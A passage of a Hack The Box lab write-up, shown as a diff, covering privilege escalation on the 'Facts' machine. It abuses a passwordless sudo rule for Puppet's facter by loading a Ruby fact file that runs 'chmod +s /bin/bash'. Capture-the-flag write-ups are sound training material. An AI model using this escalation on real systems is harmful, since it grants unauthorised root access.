blnknlights/blnknlights.github.io/docs/source/htb/machines/easy/facts/facts.md

     (ALL) NOPASSWD: /usr/bin/facter
 ```

+Facter is a ruby thing part of the Puppet / Hiera echosystem.
 ```bash
 trivia@facts:~$ sudo /usr/bin/facter --version
 4.10.0
 ```

+It gathers system info facts as ruby variables that Puppet can use
 ```bash
 sudo /usr/bin/facter --json
 wl-paste > facter.json
 ```

-Facter is a GTFO bin, with a bit of tinkering we can get it to load a script.
+Turns out facter is also a GTFO bin, with a bit of tinkering we can get it to load a script.
 ```bash
 cat /dev/shm/bork.rb
 Facter.add(:its_factual) do setcode { system("chmod +s /bin/bash") } end